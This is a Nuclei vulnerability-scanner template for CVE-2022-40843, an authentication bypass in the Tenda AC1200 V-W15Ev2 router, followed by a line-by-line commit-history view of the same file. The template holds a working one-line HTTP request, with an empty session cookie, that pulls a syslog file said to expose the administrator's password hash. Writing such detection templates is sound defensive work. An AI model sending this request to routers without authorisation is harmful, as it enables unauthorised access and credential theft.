nuclei-templates/http/cves/2022/CVE-2022-40843.yaml

id: CVE-2022-40843

info:
  name: Tenda AC1200 V-W15Ev2 - Authentication Bypass
  author: gy741
  severity: medium
  description: |
    The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
  reference:
    - https://boschko.ca/tenda_ac1200_router
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.9
    cve-id: CVE-2022-40843
    cwe-id: CWE-287
    epss-score: 0.52103
    epss-percentile: 0.97194
    cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tenda
    product: w15e_firmware
  tags: cve,cve2022,tenda,auth-bypass,router,iot

http:
  - raw:
      - |
        GET /goform/downloadSyslog/syslog.log HTTP/1.1
        Host: {{Hostname}}
        Cookie: W15Ev2_user=

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^0\d{3}$'

      - type: word
        part: body
        words:
          - "[system]"
          - "[error]"
          - "[wan1]"
        condition: or

      - type: word
        part: header
        words:
          - "Content-type: config/conf"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022070a9ea5a93db4c1ee372da97d59e40c9e1e0636cc6f76ee70a557f8e92ebe2a2022100a733b4d4e649037dae907e2aa8e583c086746b5f99abef838fd2590666a07d67:922c64590222798bb761d5b6d8e72950
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00			`id: CVE-2022-40843`

			`info:`
			`name: Tenda AC1200 V-W15Ev2 - Authentication Bypass`
			`author: gy741`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`severity: medium`
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00			`description: \|`
			The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.`
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00			`reference:`
Update CVE-2022-40843.yaml 2022-11-03 18:01:09 +00:00			`- https://boschko.ca/tenda_ac1200_router`
updated matcher & info 2023-08-01 06:13:38 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843`
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00			`classification:`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 4.9`
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00			`cve-id: CVE-2022-40843`
updated matcher & info 2023-08-01 06:13:38 +00:00			`cwe-id: CWE-287`
TemplateMan Update [Mon Oct 16 10:55:13 UTC 2023] :robot: 2023-10-16 10:55:14 +00:00			`epss-score: 0.52103`
TemplateMan Update [Sun Oct 29 11:57:58 UTC 2023] :robot: 2023-10-29 11:57:59 +00:00			`epss-percentile: 0.97194`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):::::::*`
updated matcher & info 2023-08-01 06:13:38 +00:00			`metadata:`
			`max-request: 1`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: tenda`
			`product: w15e_firmware`
updated matcher & info 2023-08-01 06:13:38 +00:00			`tags: cve,cve2022,tenda,auth-bypass,router,iot`
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00
http update 2023-08-02 04:30:36 +00:00			`http:`
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00			`- raw:`
			`- \|`
			`GET /goform/downloadSyslog/syslog.log HTTP/1.1`
			`Host: {{Hostname}}`
			`Cookie: W15Ev2_user=`

			`matchers-condition: and`
			`matchers:`
updated matcher & info 2023-08-01 06:13:38 +00:00			`- type: regex`
			`regex:`
			`- '^0\d{3}$'`

Update CVE-2022-40843.yaml 2022-11-03 18:01:09 +00:00			`- type: word`
updated matcher & info 2023-08-01 06:13:38 +00:00			`part: body`
Update CVE-2022-40843.yaml 2022-11-03 18:01:09 +00:00			`words:`
updated matcher & info 2023-08-01 06:13:38 +00:00			`- "[system]"`
			`- "[error]"`
			`- "[wan1]"`
			`condition: or`
Update CVE-2022-40843.yaml 2022-11-03 18:01:09 +00:00
Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2022-11-03 00:01:10 +00:00			`- type: word`
			`part: header`
			`words:`
			`- "Content-type: config/conf"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Sun Oct 29 15:59:44 UTC 2023] :robot: 2023-10-29 15:59:44 +00:00
			`# digest: 4a0a00473045022070a9ea5a93db4c1ee372da97d59e40c9e1e0636cc6f76ee70a557f8e92ebe2a2022100a733b4d4e649037dae907e2aa8e583c086746b5f99abef838fd2590666a07d67:922c64590222798bb761d5b6d8e72950`